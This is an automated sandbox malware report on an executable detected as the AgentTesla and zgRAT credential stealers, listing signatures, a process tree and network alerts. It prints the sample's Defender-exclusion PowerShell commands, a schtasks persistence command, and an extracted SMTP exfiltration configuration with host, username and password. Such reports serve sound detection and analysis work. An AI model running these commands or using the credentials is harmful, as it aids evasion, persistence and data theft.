
Windows Analysis Report
TTRef06022301.exe

Overview

General Information

Sample Name: TTRef06022301.exe
Analysis ID: 803161
MD5: 5478729e3225d4f158f811d03a8d4945
SHA1: e0dc6b437e0597da471e18d2ee55d412a7e5cf1a
SHA256: bfd2500b6963725aa9252fed8eb549a976ca73c9317746c40e5eb406641eae17
Tags: AgentTesla, exe

Detection

AgentTesla, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected zgRAT
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • TTRef06022301.exe (PID: 796 cmdline: C:\Users\user\Desktop\TTRef06022301.exe MD5: 5478729E3225D4F158F811D03A8D4945)
    • powershell.exe (PID: 6044 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1008 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5636 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • TTRef06022301.exe (PID: 5996 cmdline: C:\Users\user\Desktop\TTRef06022301.exe MD5: 5478729E3225D4F158F811D03A8D4945)
  • iJyzakGsXF.exe (PID: 1752 cmdline: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: 5478729E3225D4F158F811D03A8D4945)
    • schtasks.exe (PID: 4876 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • iJyzakGsXF.exe (PID: 3824 cmdline: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: 5478729E3225D4F158F811D03A8D4945)
    • iJyzakGsXF.exe (PID: 3696 cmdline: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe MD5: 5478729E3225D4F158F811D03A8D4945)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "mail.keefort.com.ec", "Username": "ssg@keefort.com.ec", "Password": "u=Wa6eChU3nj      "}
Source | Rule | Description | Author | Strings
00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: TTRef06022301.exe PID: 5996 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings
0.2.TTRef06022301.exe.3986f10.11.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.TTRef06022301.exe.3986f10.11.raw.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
0.2.TTRef06022301.exe.395dcf0.8.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.2.TTRef06022301.exe.395dcf0.8.raw.unpack | MALWARE_Win_zgRAT | Detects zgRAT | ditekSHen |
0.2.TTRef06022301.exe.39308d0.9.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\TTRef06022301.exe, ParentImage: C:\Users\user\Desktop\TTRef06022301.exe, ParentProcessId: 796, ParentProcessName: TTRef06022301.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp, ProcessId: 5636, ProcessName: schtasks.exe
Timestamp: 02/09/23-19:40:35.012308
Source IP: 192.168.2.7
Destination IP: 88.99.90.21
Source Port: 49716
Destination Port: 587
SID: 2030171
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 02/09/23-19:40:59.212357
Source IP: 192.168.2.7
Destination IP: 88.99.90.21
Source Port: 49721
Destination Port: 587
SID: 2030171
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: TTRef06022301.exe, Virustotal: Detection: 66%
Source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.keefort.com.ec", "Username": "ssg@keefort.com.ec", "Password": "u=Wa6eChU3nj "}
Source: TTRef06022301.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.7:49718 version: TLS 1.2
Source: TTRef06022301.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vEfr.pdbSHA256+J${ source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr
Source: Binary string: vEfr.pdb source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr

Networking

Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.7:49716 -> 88.99.90.21:587
Source: Traffic, Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.7:49721 -> 88.99.90.21:587
Source: C:\Users\user\Desktop\TTRef06022301.exe, DNS query: name: api.ipify.org
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe, DNS query: name: api.ipify.org
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View, IP Address: 88.99.90.21
Source: Joe Sandbox View, IP Address: 104.237.62.211
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0, Host: api.ipify.org, Connection: Keep-Alive
Source: global traffic, TCP traffic: 192.168.2.7:49716 -> 88.99.90.21:587
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown, Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown, Network traffic detected: HTTP traffic on port 49718 -> 443
Source: TTRef06022301.exe, 00000008.00000003.282832205.0000000001089000.00000004.00000020.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.502249400.0000000001095000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000003.336831683.0000000001240000.00000004.00000020.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.501452553.0000000001242000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: TTRef06022301.exe, 00000000.00000002.285237597.0000000006802000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://fontfabrik.com
Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://keefort.com.ec
Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002FCE000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://mail.keefort.com.ec
Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002551000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000007.00000002.319999505.0000000002743000.00000004.00000800.00020000.00000000.sdmp, TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org
Source: TTRef06022301.exe, 00000008.00000002.504076365.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, iJyzakGsXF.exe, 00000014.00000002.504040549.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/
Source: unknown, DNS traffic detected: queries for: api.ipify.org
Source: iJyzakGsXF.exe, 00000007.00000002.317156647.00000000008C8000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPE, Matched rule: Detects zgRAT Author: ditekSHen
Source: TTRef06022301.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.TTRef06022301.exe.3986f10.11.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.TTRef06022301.exe.395dcf0.8.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.TTRef06022301.exe.39308d0.9.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\Desktop\TTRef06022301.exe, Code function: 0_2_00ABFB80
Source: C:\Users\user\Desktop\TTRef06022301.exe, Code function: 0_2_00ABEBA0
Source: C:\Users\user\Desktop\TTRef06022301.exe, Code function: 0_2_00ABEB90
Source: C:\Users\user\Desktop\TTRef06022301.exe, Code function: 0_2_00ABD16C
Source: C:\Users\user\Desktop\TTRef06022301.exe, Code function: 0_2_027C015C
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe, Code function: 7_2_008BEB90
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe, Code function: 7_2_008BEBA0
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe, Code function: 7_2_008BD16C
Source: TTRef06022301.exe, 00000000.00000002.273699340.0000000002C15000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.273699340.0000000002C2B000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000000.232892755.0000000000274000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenamevEfr.exe> vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameB4000.dll> vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.273699340.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename48864580-1a97-4cef-8774-55508fd4d5f6.exe4 vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.279783604.0000000003930000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename48864580-1a97-4cef-8774-55508fd4d5f6.exe4 vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.279783604.0000000003930000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameHIVacSim.dll2 vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.288231981.0000000006DE0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameHIVacSim.dll2 vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.284216822.0000000004DC0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameB4000.dll> vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000000.00000002.273699340.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCruiser.dll, vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000008.00000002.502249400.0000000000FB0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000008.00000002.501213513.00000000009B8000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TTRef06022301.exe
Source: TTRef06022301.exe, 00000008.00000002.500438204.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilename48864580-1a97-4cef-8774-55508fd4d5f6.exe4 vs TTRef06022301.exe
Source: TTRef06022301.exe, Binary or memory string: OriginalFilenamevEfr.exe> vs TTRef06022301.exe
Source: TTRef06022301.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: iJyzakGsXF.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TTRef06022301.exe, Virustotal: Detection: 66%
Source: C:\Users\user\Desktop\TTRef06022301.exe, File read: C:\Users\user\Desktop\TTRef06022301.exe
Source: C:\Users\user\Desktop\TTRef06022301.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Users\user\Desktop\TTRef06022301.exe C:\Users\user\Desktop\TTRef06022301.exe
Source: C:\Users\user\Desktop\TTRef06022301.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TTRef06022301.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TTRef06022301.exe, Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
Source: C:\Users\user\Desktop\TTRef06022301.exe, Process created: C:\Users\user\Desktop\TTRef06022301.exe C:\Users\user\Desktop\TTRef06022301.exe
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe, Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe, Process created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe, Process created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | File created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | File created: C:\Users\user\AppData\Local\Temp\tmp685E.tmp
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/11@8/4
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: TTRef06022301.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4964:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: TTRef06022301.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: TTRef06022301.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: TTRef06022301.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: vEfr.pdbSHA256+J${ source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr
                  Source: Binary string: vEfr.pdb source: TTRef06022301.exe, iJyzakGsXF.exe.0.dr

                  Data Obfuscation

                  Source: TTRef06022301.exe, GraphComposite/Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.TTRef06022301.exe.1b0000.0.unpack, GraphComposite/Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Code function: 0_2_00AB9BF8 push 780274A5h; ret 0_2_00AB9CB5
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Code function: 0_2_00AB9C58 push 780274A5h; ret 0_2_00AB9CB5
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Code function: 0_2_027CA88F push cs; ret 0_2_027CA8C6
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Code function: 0_2_027CDEF8 push cs; ret 0_2_027CDF46
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Code function: 7_2_008B9CB0 push 7800D3A5h; ret 7_2_008B9CB5
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Code function: 7_2_008BDF88 pushad ; iretd 7_2_008BDF89
                  Source: initial sample | Static PE information: section name: .text entropy: 7.977721750892678
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | File created: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe

                  Boot Survival

                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp"
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\iJyzakGsXF.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\TTRef06022301.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
